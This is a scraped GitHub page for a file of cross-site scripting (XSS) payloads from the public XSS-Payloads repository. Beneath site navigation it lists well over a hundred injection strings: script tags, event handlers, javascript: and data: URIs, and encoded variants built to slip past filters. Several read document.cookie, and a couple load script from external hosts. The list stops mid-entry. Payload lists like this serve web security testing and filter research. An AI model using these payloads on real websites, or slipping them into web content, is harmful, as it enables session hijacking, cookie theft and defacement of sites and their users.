XSS-Payloads/payload.txt at master · pgaijin66 ... - GitHub



{"locale":"en","featureFlags":["code_vulnerability_scanning","copilot_beta_features_opt_in","copilot_chat_static_thread_suggestions","copilot_completion_new_domain","copilot_conversational_ux_history_refs","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","custom_inp","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_maps","ghas_copilot_agents_ga_web_updates","ghost_pilot_screen_reader","ghost_pilot_stream_handling","hovercard_accessibility","hovercard_longer_activate_timeout","marketing_pages_search_explore_provider","remove_child_patch","sample_network_conn_type","site_metered_billing_update","ignore_hidden_in_quote_reply"]}

XSS-Payloads/payload/payload.txt at master · pgaijin66/XSS-Payloads · GitHub

Skip to content

{"props":{"docsUrl":""}}

Navigation Menu

Toggle navigation

Sign in

Product

Actions

Automate any workflow

Packages

Host and manage packages

Security

Find and fix vulnerabilities

Codespaces

Instant dev environments

GitHub Copilot

Write better code with AI

Code review

Manage code changes

Issues

Plan and track work

Discussions

Collaborate outside of code

Explore

All features

Documentation

GitHub Skills

Blog

Solutions

By size

Enterprise

Teams

Startups

By industry

Healthcare

Financial services

Manufacturing

By use case

CI/CD & Automation

DevOps

DevSecOps

Resources

Topics

AI

DevOps

Security

Software Development

Explore

Learning Pathways

White papers, Ebooks, Webinars

Customer Stories

Partners

Open Source

GitHub Sponsors

Fund open source developers

The ReadME Project

GitHub community articles

Repositories

Topics

Trending

Collections

Enterprise

Enterprise platform

AI-powered developer platform

Available add-ons

Advanced Security

Enterprise-grade security features

GitHub Copilot

Enterprise-grade AI features

Premium Support

Enterprise-grade 24/7 support

Pricing

Search or jump to...

Search code, repositories, users, issues, pull requests...

Search

Clear

Search syntax tips

Provide feedback

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

Cancel

Submit feedback

Saved searches

Use saved searches to filter your results more quickly

Name

Query

To see all available qualifiers, see our documentation.

Cancel

Create saved search

Sign in

Sign up

Reseting focus

You signed in with another tab or window. Reload to refresh your session.

You signed out in another tab or window. Reload to refresh your session.

You switched accounts on another tab or window. Reload to refresh your session.

Dismiss alert

{{ message }}

pgaijin66

/

XSS-Payloads

Public

Notifications

You must be signed in to change notification settings

Fork

791

Star

1k

Code

Issues

0

Pull requests

0

Actions

Projects

0

Security

Insights

Additional navigation options

Code

Issues

Pull requests

Actions

Projects

Security

Insights

{"payload":{"allShortcutsEnabled":false,"fileTree":{"payload":{"items":[{"name":"payload.txt","path":"payload/payload.txt","contentType":"file"}],"totalCount":1},"":{"items":[{"name":"payload","path":"payload","contentType":"directory"},{"name":"LICENSE","path":"LICENSE","contentType":"file"},{"name":"README.md","path":"README.md","contentType":"file"}],"totalCount":3}},"fileTreeProcessingTime":4.044811,"foldersToFetch":[],"repo":{"id":66336325,"defaultBranch":"master","name":"XSS-Payloads","ownerLogin":"pgaijin66","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2016-08-23T05:36:04.000Z","ownerAvatar":"","public":true,"private":false,"isOrgOwned":false},"codeLineWrapEnabled":false,"symbolsExpanded":false,"treeExpanded":true,"refInfo":{"name":"master","listCacheKey":"v0:1471930566.0","canEdit":false,"refType":"branch","currentOid":"67ecfe2be12bfa5a5419ace8f077c3f1b4be4642"},"path":"payload/payload.txt","currentUser":null,"blob":{"rawLines":["\u003cscript\u003ealert(123);\u003c/script\u003e\r","\u003cScRipT\u003ealert(\"XSS\");\u003c/ScRipT\u003e\r","\u003cscript\u003ealert(123)\u003c/script\u003e\r","\u003cscript\u003ealert(\"hellox worldss\");\u003c/script\u003e\r","\u003cscript\u003ealert(“XSS”)\u003c/script\u003e \r","\u003cscript\u003ealert(“XSS”);\u003c/script\u003e\r","\u003cscript\u003ealert(‘XSS’)\u003c/script\u003e\r","“\u003e\u003cscript\u003ealert(“XSS”)\u003c/script\u003e\r","\u003cscript\u003ealert(/XSS”)\u003c/script\u003e\r","\u003cscript\u003ealert(/XSS/)\u003c/script\u003e\r","\u003c/script\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\r","‘; alert(1);\r","‘)alert(1);//\r","\u003cScRiPt\u003ealert(1)\u003c/sCriPt\u003e\r","\u003cIMG SRC=jAVasCrIPt:alert(‘XSS’)\u003e\r","\u003cIMG SRC=”javascript:alert(‘XSS’);”\u003e\r","\u003cIMG SRC=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\r","\u003cIMG SRC=javascript:alert(‘XSS’)\u003e \r","\u003cimg src=xss onerror=alert(1)\u003e\r","\r","\r","\u003ciframe %00 src=\"\u0026Tab;javascript:prompt(1)\u0026Tab;\"%00\u003e\r","\r","\u003csvg\u003e\u003cstyle\u003e{font-family\u0026colon;'\u003ciframe/onload=confirm(1)\u003e'\r","\r","\u003cinput/onmouseover=\"javaSCRIPT\u0026colon;confirm\u0026lpar;1\u0026rpar;\"\r","\r","\u003csVg\u003e\u003cscRipt %00\u003ealert\u0026lpar;1\u0026rpar; {Opera}\r","\r","\u003cimg/src=`%00` onerror=this.onerror=confirm(1)\r","\r","\u003cform\u003e\u003cisindex formaction=\"javascript\u0026colon;confirm(1)\"\r","\r","\u003cimg src=`%00`\u0026NewLine; onerror=alert(1)\u0026NewLine;\r","\r","\u003cscript/\u0026Tab; src='' /\u0026Tab;\u003e\u003c/script\u003e\r","\r","\u003cScRipT 5-0*3+9/3=\u003eprompt(1)\u003c/ScRipT giveanswerhere=?\r","\r","\u003ciframe/src=\"data:text/html;\u0026Tab;base64\u0026Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\"\u003e\r","\r","\u003cscript /*%00*/\u003e/*%00*/alert(1)/*%00*/\u003c/script /*%00*/\r","\r","\u0026#34;\u0026#62;\u003ch1/onmouseover='\\u0061lert(1)'\u003e%00\r","\r","\u003ciframe/src=\"data:text/html,\u003csvg \u0026#111;\u0026#110;load=alert(1)\u003e\"\u003e\r","\r","\u003cmeta content=\"\u0026NewLine; 1 \u0026NewLine;; JAVASCRIPT\u0026colon; alert(1)\" http-equiv=\"refresh\"/\u003e\r","\r","\u003csvg\u003e\u003cscript xlink:href=data\u0026colon;,window.open('')\u003e\u003c/script\r","\r","\u003csvg\u003e\u003cscript x:href='' {Opera}\r","\r","\u003cmeta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\"\u003e\r","\u003ciframe src=javascript\u0026colon;alert\u0026lpar;document\u0026period;location\u0026rpar;\u003e\r","\r","\u003cform\u003e\u003ca href=\"javascript:\\u0061lert\u0026#x28;1\u0026#x29;\"\u003eX\r","\r","\u003c/script\u003e\u003cimg/*%00/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/%00*/onerror='eval(src)'\u003e\r","\u003cimg/\u0026#09;\u0026#10;\u0026#11; src=`~` onerror=prompt(1)\u003e\r","\u003cform\u003e\u003ciframe \u0026#09;\u0026#10;\u0026#11; src=\"javascript\u0026#58;alert(1)\"\u0026#11;\u0026#10;\u0026#09;;\u003e\r","\r","\u003ca href=\"data:application/x-x509-user-cert;\u0026NewLine;base64\u0026NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u0026#09;\u0026#10;\u0026#11;\u003eX\u003c/a\r","\r","\u003cscript .com\u003ealert(document.location)\u003c/script\r","\r","\u003ca\u0026#32;href\u0026#61;\u0026#91;\u0026#00;\u0026#93;\"\u0026#00; onmouseover=prompt\u0026#40;1\u0026#41;\u0026#47;\u0026#47;\"\u003eXYZ\u003c/a\r","\r","\u003cimg/src=@\u0026#32;\u0026#13; onerror = prompt('\u0026#49;')\r","\r","\u003cstyle/onload=prompt\u0026#40;'\u0026#88;\u0026#83;\u0026#83;'\u0026#41;\r","\r","\u003cscript ^__^\u003ealert(String.fromCharCode(49))\u003c/script ^__^\r","\r","\u003c/style \u0026#32;\u003e\u003cscript \u0026#32; :-(\u003e/**/alert(document.location)/**/\u003c/script \u0026#32; :-(\r","\r","\u0026#00;\u003c/form\u003e\u003cinput type\u0026#61;\"date\" onfocus=\"alert(1)\"\u003e\r","\r","\u003cform\u003e\u003ctextarea \u0026#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074\u0026#x28;1\u0026#x29;'\u003e\r","\r","\u003cscript /***/\u003e/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/\u003c/script /***/\r","\r","\u003ciframe srcdoc='\u0026lt;body onload=prompt\u0026lpar;1\u0026rpar;\u0026gt;'\u003e\r","\r","\u003ca href=\"javascript:void(0)\" onmouseover=\u0026NewLine;javascript:alert(1)\u0026NewLine;\u003eX\u003c/a\u003e\r","\r","\u003cscript ~~~\u003ealert(0%0)\u003c/script ~~~\u003e\r","\r","\u003cstyle/onload=\u0026lt;!--\u0026#09;\u0026gt;\u0026#10;alert\u0026#10;\u0026lpar;1\u0026rpar;\u003e\r","\r","\u003c///style///\u003e\u003cspan %2F onmousemove='alert\u0026lpar;1\u0026rpar;'\u003eSPAN\r","\r","\u003cimg/src='' onmouseover=\u0026Tab;prompt(1)\r","\r","\u0026#34;\u0026#62;\u003csvg\u003e\u003cstyle\u003e{-o-link-source\u0026colon;'\u003cbody/onload=confirm(1)\u003e'\r","\r","\u0026#13;\u003cblink/\u0026#13; onmouseover=pr\u0026#x6F;mp\u0026#116;(1)\u003eOnMouseOver {Firefox \u0026 Opera}\r","\r","\u003cmarquee onstart='javascript:alert\u0026#x28;1\u0026#x29;'\u003e^__^\r","\r","\u003cdiv/style=\"width:expression(confirm(1))\"\u003eX\u003c/div\u003e {IE7}\r","\r","\u003ciframe/%00/ src=javaSCRIPT\u0026colon;alert(1)\r","\r","//\u003cform/action=javascript\u0026#x3A;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003e\u003cinput/type='submit'\u003e//\r","\r","/*iframe/src*/\u003ciframe/src=\"\u003ciframe/src=@\"/onload=prompt(1) /*iframe/src*/\u003e\r","\r","//|\\\\ \u003cscript //|\\\\ src=''\u003e //|\\\\ \u003c/script //|\\\\\r","\r","\u003c/font\u003e/\u003csvg\u003e\u003cstyle\u003e{src\u0026#x3A;'\u003cstyle/onload=this.onload=confirm(1)\u003e'\u003c/font\u003e/\u003c/style\u003e\r","\r","\u003ca/href=\"javascript:\u0026#13; javascript:prompt(1)\"\u003e\u003cinput type=\"X\"\u003e\r","\r","\u003c/plaintext\\\u003e\u003c/|\\\u003e\u003cplaintext/onmouseover=prompt(1)\r","\r","\u003c/svg\u003e''\u003csvg\u003e\u003cscript 'AQuickBrownFoxJumpsOverTheLazyDog'\u003ealert\u0026#x28;1\u0026#x29; {Opera}\r","\r","\u003ca href=\"javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t\u0026lpar;1\u0026rpar;\"\u003e\u003cbutton\u003e\r","\r","\u003cdiv onmouseover='alert\u0026lpar;1\u0026rpar;'\u003eDIV\u003c/div\u003e\r","\r","\u003ciframe style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\"\u003e\r","\r","\u003ca href=\"jAvAsCrIpT\u0026colon;alert\u0026lpar;1\u0026rpar;\"\u003eX\u003c/a\u003e\r","\r","\u003cembed src=\"\"\u003e\r","\r","\u003cobject data=\"\"\u003e\r","\r","\u003cvar onmouseover=\"prompt(1)\"\u003eOn Mouse Over\u003c/var\u003e\r","\r","\u003ca href=javascript\u0026colon;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003eClick Here\u003c/a\u003e\r","\r","\u003cimg src=\"/\" =_=\" title=\"onerror='prompt(1)'\"\u003e\r","\r","\u003c%\u003c!--'%\u003e\u003cscript\u003ealert(1);\u003c/script --\u003e\r","\r","\u003cscript src=\"data:text/javascript,alert(1)\"\u003e\u003c/script\u003e\r","\u003ciframe/src \\/\\/onload = prompt(1)\r","\r","\u003ciframe/onreadystatechange=alert(1)\r","\r","\u003csvg/onload=alert(1)\r","\r","\u003cinput value=\u003c\u003e\u003ciframe/src=javascript:confirm(1)\r","\r","\u003cinput type=\"text\" value=`` \u003cdiv/onmouseover='alert(1)'\u003eX\u003c/div\u003e\r","\r",".\u003cscript\u003ealert(1)\u003c/script .com\r","\r","\u003ciframe src=j\u0026NewLine;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;v\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;s\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;c\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;i\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;p\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026colon;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;l\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;e\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;28\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;1\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;%29\u003e\u003c/iframe\u003e\r","\r","\u003csvg\u003e\u003cscript ?\u003ealert(1)\r","\r","\u003ciframe src=j\u0026Tab;a\u0026Tab;v\u0026Tab;a\u0026Tab;s\u0026Tab;c\u0026Tab;r\u0026Tab;i\u0026Tab;p\u0026Tab;t\u0026Tab;:a\u0026Tab;l\u0026Tab;e\u0026Tab;r\u0026Tab;t\u0026Tab;%28\u0026Tab;1\u0026Tab;%29\u003e\u003c/iframe\u003e\r","\r","\u003cimg src=`xx:xx`onerror=alert(1)\u003e\r","\r","\u003cmeta http-equiv=\"refresh\" content=\"0;javascript\u0026colon;alert(1)\"/\u003e\r","\u003cmath\u003e\u003ca xlink:href=\"//t846h/\"\u003eclick\r","\r","\u003cembed code=\"\" allowscriptaccess=always\u003e\r","\u003csvg contentScriptType=text/vbs\u003e\u003cscript\u003eMsgBox+1\r","\r","\u003ca href=\"data:text/html;base64_,\u003csvg/onload=\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\"\u003eX\u003c/a\r","\r","\u003ciframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE\u003e\r","\r","\u003cscript\u003e~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')\u003c/script U+\r","\r","\u003cscript/src=\"data\u0026colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"\u003e\u003c/script a=\\u0061 \u0026 /=%2F\r","\u003cscript/src=data\u0026colon;text/j\\u0061v\\u0061\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116,\\u0061%6C%65%72%74(/XSS/)\u003e\u003c/script\r","\r","\u003cobject data=javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\r","\r","\u003cscript\u003e+-+-1-+-+alert(1)\u003c/script\u003e\r","\r","\u003cbody/onload=\u0026lt;!--\u0026gt;\u0026#10alert(1)\u003e\r","\r","\u003cscript itworksinallbrowsers\u003e/*\u003cscript* */alert(1)\u003c/script\r","\r","\u003cimg src ?itworksonchrome?\\/onerror = alert(1)\r","\r","\u003csvg\u003e\u003cscript\u003e//\u0026NewLine;confirm(1);\u003c/script \u003c/svg\u003e\r","\u003csvg\u003e\u003cscript onlypossibleinopera:-)\u003e alert(1)\r","\r","\u003ca aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j\u0026#97v\u0026#97script\u0026#x3A;\u0026#97lert(1)\u003eClickMe\r","\r","\u003cscript x\u003e alert(1) \u003c/script 1=2\r","\r","\u003cdiv/onmouseover='alert(1)'\u003e style=\"x:\"\u003e\r","\r","\u003c--`\u003cimg/src=` onerror=alert(1)\u003e --!\u003e\r"," \u003cscript/src=\u0026#100\u0026#97\u0026#116\u0026#97:text/\u0026#x6a\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x000070\u0026#x074,\u0026#x0061;\u0026#x06c;\u0026#x0065;\u0026#x00000072;\u0026#x00074;(1)\u003e\u003c/script\u003e\r","\r","\u003cdiv style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\"\u003ex\u003c/button\u003e\r","\r","\"\u003e\u003cimg src=x onerror=window.open('');\u003e\r","\r","\u003cform\u003e\u003cbutton formaction=javascript\u0026colon;alert(1)\u003eCLICKME\r","\r","\u003cmath\u003e\u003ca xlink:href=\"//t846h/\"\u003eclick\r","\r","\u003cobject data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+\u003e\u003c/object\u003e\r","\r","\u003ciframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"\u003e\u003c/iframe\u003e\r","\r","\u003ca href=\"data:text/html;blabla,\u0026#60\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#32\u0026#115\u0026#114\u0026#99\u0026#61\u0026#34\u0026#104\u0026#116\u0026#116\u0026#112\u0026#58\u0026#47\u0026#47\u0026#115\u0026#116\u0026#101\u0026#114\u0026#110\u0026#101\u0026#102\u0026#97\u0026#109\u0026#105\u0026#108\u0026#121\u0026#46\u0026#110\u0026#101\u0026#116\u0026#47\u0026#102\u0026#111\u0026#111\u0026#46\u0026#106\u0026#115\u0026#34\u0026#62\u0026#60\u0026#47\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#62\u0026#8203\"\u003eClick Me\u003c/a\u003e\r","\r","\u003cSCRIPT\u003eString.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)\u003c/SCRIPT\u003e\r","‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–\u003e\u003c/SCRIPT\u003e”\u003e’\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\r","\u003cIMG “””\u003e\u003cSCRIPT\u003ealert(“XSS”)\u003c/SCRIPT\u003e”\u003e\r","\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\r","\u003cIMG SRC=”jav ascript:alert(‘XSS’);”\u003e\r","\u003cIMG SRC=”jav\u0026#x09;ascript:alert(‘XSS’);”\u003e\r","\u003c\u003cSCRIPT\u003ealert(“XSS”);//\u003c\u003c/SCRIPT\u003e\r","%253cscript%253ealert(1)%253c/script%253e\r","“\u003e\u003cs”%2b”cript\u003ealert(document.cookie)\u003c/script\u003e\r","foo\u003cscript\u003ealert(1)\u003c/script\u003e\r","\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003c/script\u003eipt\u003e\r","\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\r","\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\r","\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\r","\u003cBODY BACKGROUND=”javascript:alert(‘XSS’)”\u003e\r","\u003cBODY ONLOAD=alert(‘XSS’)\u003e\r","\u003cINPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”\u003e\r","\u003cIMG SRC=”javascript:alert(‘XSS’)”\r","\u003ciframe src= \u003c\r","javascript:alert(\"hellox worldss\")\r","\u003cimg src=\"javascript:alert('XSS');\"\u003e\r","\u003cimg src=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\r","\u003c\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\r","\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\r","\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\r","\u003cEMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\r","\u003cSCRIPT a=\"\u003e\" SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cSCRIPT a=\"\u003e\" '' SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cSCRIPT \"a='\u003e'\" SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cSCRIPT a=\"\u003e'\u003e\" SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"\"\u003e\u003c/SCRIPT\u003e\r","\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\r","\u003c\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\r","';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c?/SCRIPT\u003e\u0026submit.x=27\u0026submit.y=9\u0026cmd=search\r","\u003cscript\u003ealert(\"hellox worldss\")\u003c/script\u003e\u0026safe=high\u0026cx=006665157904466893121:su_tzknyxug\u0026cof=FORID:9#510\r","\u003cscript\u003ealert(\"XSS\");\u003c/script\u003e\u0026search=1\r","0\u0026q=';alert(String.fromCharCode(88,83,83))//\\';alert%2?8String.fromCharCode(88,83,83))//\";alert(String.fromCharCode?(88,83,83))//\\\";alert(String.fromCharCode(88,83,83)%?29//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83%?2C83))\u003c/SCRIPT\u003e\u0026submit-frmGoogleWeb=Web+Search\r","\u003ch1\u003e\u003cfont color=blue\u003ehellox worldss\u003c/h1\u003e\r","\u003cBODY ONLOAD=alert('hellox worldss')\u003e\r","\u003cinput onfocus=write(XSS) autofocus\u003e\r","\u003cinput onblur=write(XSS) autofocus\u003e\u003cinput autofocus\u003e\r","\u003cbody onscroll=alert(XSS)\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\r","\u003cform\u003e\u003cbutton formaction=\"javascript:alert(XSS)\"\u003elol\r","\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\r","\u003c![\u003e\u003cimg src=\"]\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\r","\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\r","\u003c? foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c! foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c/ foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c? foo=\"\u003e\u003cx foo='?\u003e\u003cscript\u003ealert(1)\u003c/script\u003e'\u003e\"\u003e\r","\u003c! foo=\"[[[Inception]]\"\u003e\u003cx foo=\"]foo\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\r","\u003c% foo\u003e\u003cx foo=\"%\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\"\u003e\r","\u003cdiv style=\"font-family:'foo\u0026#10;;color:red;';\"\u003eLOL\r","LOL\u003cstyle\u003e*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}\u003c/style\u003e\r","\u003cscript\u003e({0:#0=alert/#0#/#0#(0)})\u003c/script\u003e\r","\u003csvg xmlns=\"\"\u003eLOL\u003cscript\u003ealert(123)\u003c/script\u003e\u003c/svg\u003e\r","\u0026lt;SCRIPT\u0026gt;alert(/XSS/\u0026#46;source)\u0026lt;/SCRIPT\u0026gt;\r","\\\\\";alert('XSS');//\r","\u0026lt;/TITLE\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");\u0026lt;/SCRIPT\u0026gt;\r","\u0026lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;BODY BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\r","\u0026lt;BODY ONLOAD=alert('XSS')\u0026gt;\r","\u0026lt;IMG DYNSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\r","\u0026lt;IMG LOWSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\r","\u0026lt;BGSOUND SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;BR SIZE=\\\"\u0026{alert('XSS')}\\\"\u0026gt;\r","\u0026lt;LAYER SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/LAYER\u0026gt;\r","\u0026lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\r","\u0026lt;LINK REL=\\\"stylesheet\\\" 